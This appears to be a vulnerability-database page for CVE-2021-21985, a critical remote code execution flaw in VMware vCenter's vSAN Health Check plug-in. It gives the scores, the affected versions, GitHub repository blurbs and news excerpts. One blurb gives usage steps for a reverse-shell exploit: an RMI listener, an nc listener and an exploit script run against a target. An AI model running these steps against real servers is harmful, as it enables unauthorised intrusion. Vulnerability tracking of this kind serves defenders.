CVE-2021-21985

Published: 26/05/2021 | Updated: 03/06/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client. The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

Vulnerable Product

vmware vcenter server 6.5

vmware vcenter server 6.7

vmware vcenter server 7.0

vmware cloud foundation

Github Repositories

cve-2021-21985 exploit. 0x01 Vulnerability location: for the analysis see attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis 0x02 exploit: reconstruct the beans objects to achieve RCE. Bean list: localizedMessageBundle vsanWorkerThreadFactory vsanThreadPoolImpl vsanServiceBundleActivator vsanServiceFactory vsanProviderUtils_setVmodlHelper vsanProviderUtils_s

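CVE-2021-21985: CVE-2021-21985 EXP reverse shell. This article and tool are for technical sharing only; illegal use is strictly prohibited, and you bear all resulting consequences yourself. 1 Start an RMI listener on port 1099 on the VPS 2 Start an nc listener on port 8443 on the VPS: nc -lvp 8443 3 Run the python script: python3 CVE-2021-21985_exp.py <target> <rmi://ip/class>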

CVE-2021-21985 (Vulnerable Code) CLASS/METHOD(s) available, a little sample for PoC purposes: com.vmware.vsan.client.services.capability.VsanCapabilityProvider [/snip] getClusterCapabilityData getHostCapabilityData getHostsCapabilitiyData getIsDeduplicationSupported getIsEncryptionSupported getIsLocalDataProtectionSupportedOnVc getIsLocalDataProtectionSupportedOnCluster getI

cve-2021-21985 my poc for cve-2021-21985

CVE-2021-21985: The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor with network access to port

CVE-2021-21985 Checker: Simple PowerShell implementation of @alt3kx nmap script. Usage: .\CVE-2021-21985.ps1 vcenterhostname.com Output: TARGET VULNERABLE or TARGET NOT VULNERABLE

Project_CVE-2021-21985_PoC

Recent Articles

Attackers scan for unpatched VMware vCenter servers, PoC exploit available
BleepingComputer • Sergiu Gatlan • 04 Jun 2021

Threat actors are actively scanning for Internet-exposed VMware vCenter servers unpatched against a critical remote code execution (RCE) vulnerability impacting all vCenter deployments and 
.
The ongoing scanning activity was 
 by threat intelligence company Bad Packets yesterday and 
 earlier today by cybersecurity expert Kevin Beaumont.
Security researchers have also developed and published a proof-of-concept (PoC) RCE exploit code targeting this critical VM...

Attackers are scanning for vulnerable VMware servers, patch now!
BleepingComputer • Sergiu Gatlan • 04 Jun 2021

VMware reveals critical vCenter hole it says ‘needs to be considered at once’
The Register • Simon Sharwood, APAC Editor • 26 May 2021

Unauthenticated remote code execution possible thanks to vSphere Client bug

VMware has revealed a critical bug that can be exploited to achieve unauthenticated remote code execution in the very core of a virtualised system – vCenter Server.
The culprit is the vSphere HTML5 client, which by default includes the Virtual SAN Health plugin – even if you don’t run a VMware VSAN. That plugin lacks input validation and the result, as explained by VMware’s advisory this week, is: “A malicious actor with network access to port 443 may exploit this issue to execut...
